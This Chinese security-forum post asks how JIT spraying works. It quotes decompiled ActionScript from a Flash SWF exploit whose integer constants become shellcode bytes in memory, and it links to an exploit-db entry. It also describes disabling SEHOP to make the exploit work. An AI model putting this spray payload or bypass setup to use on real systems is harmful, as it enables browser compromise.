比如一个swf文件,它的中间代码大概是这样:
_as3_pushint 156456771
_as3_callpropvoid writeInt(param count:1)
_as3_getlocal <0>
_as3_getproperty jit_egg
_as3_pushint 1359
_as3_callpropvoid writeInt(param count:1)
_as3_getlocal <0>
_as3_getproperty jit_egg
_as3_pushdouble 2462964344
_as3_callpropvoid writeInt(param count:1)
_as3_getlocal <0>
_as3_getproperty jit_egg
_as3_pushint 1163161579
反汇编源代码是这样:
function pageLoadEx()
{
var _loc_1:* = new Loader();
this.jit_egg.endian = Endian.LITTLE_ENDIAN;
this.jit_egg.writeInt(156456771);
this.jit_egg.writeInt(1359);
this.jit_egg.writeInt(2462964344);
this.jit_egg.writeInt(1163161579);
this.jit_egg.writeInt(1986512408);
this.jit_egg.writeInt(3174682486);
this.jit_egg.writeInt(2720797961);
this.jit_egg.writeInt(3495836630);
this.jit_egg.writeInt(3212324519);
this.jit_egg.writeInt(1429101399);
this.jit_egg.writeInt(3932031664);
this.jit_egg.writeInt(635156349);
this.jit_egg.writeInt(3547179436);
this.jit_egg.writeInt(1407471022);
this.jit_egg.writeInt(1971932635);
this.jit_egg.writeInt(277404755);
this.jit_egg.writeInt(2327105845);
this.jit_egg.writeInt(1829846665);
this.jit_egg.writeInt(877160627);
this.jit_egg.writeInt(403690194);
this.jit_egg.writeInt(2292273698);
this.jit_egg.writeInt(3686507624);
this.jit_egg.writeInt(3205928413);
this.jit_egg.writeInt(117197396);
this.jit_egg.writeInt(81108174);
this.jit_egg.writeInt(2627472381);
this.jit_egg.writeInt(4013816252);
this.jit_egg.writeInt(1003287484);
this.jit_egg.writeInt(2488116851);
this.jit_egg.writeInt(3203958118);
但在内存中就变成了 0x3c909090 之类的,也就是write jit spray for fun 那篇文章中提到的类似xor指令序列了
这些整数我都看过,转成16进制直接看,貌似跟0x3c909090没半点关系,但在内存中就变成了90 90 90 3c 35之类的攻击指令了
代码链接见:http://www.exploit-db.com/exploits/14599/
这是一个插件漏洞,漏洞没什么用,不值得去分析,找出来是想讨论下jit spray。那个swf文件是怎么喷射的,怎么就在内存中形成了90 90 90 3c 35之类的指令了??
我在windows7的ie9下测试,ok~~ 前提是把ie9的sehop保护先去掉(这跟这个漏洞的原理有关了)~~ flash player必须是10.0.X的,这个你懂的。 执行完后,若成功,转到www.exploit-db.com这个网站,里面的代码我没仔细分析过,所以有没有木马之类的,我无法保证。。。。。。。但毕竟是exploit-db的,应该没什么恶意~~
望大家多多指教~~
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!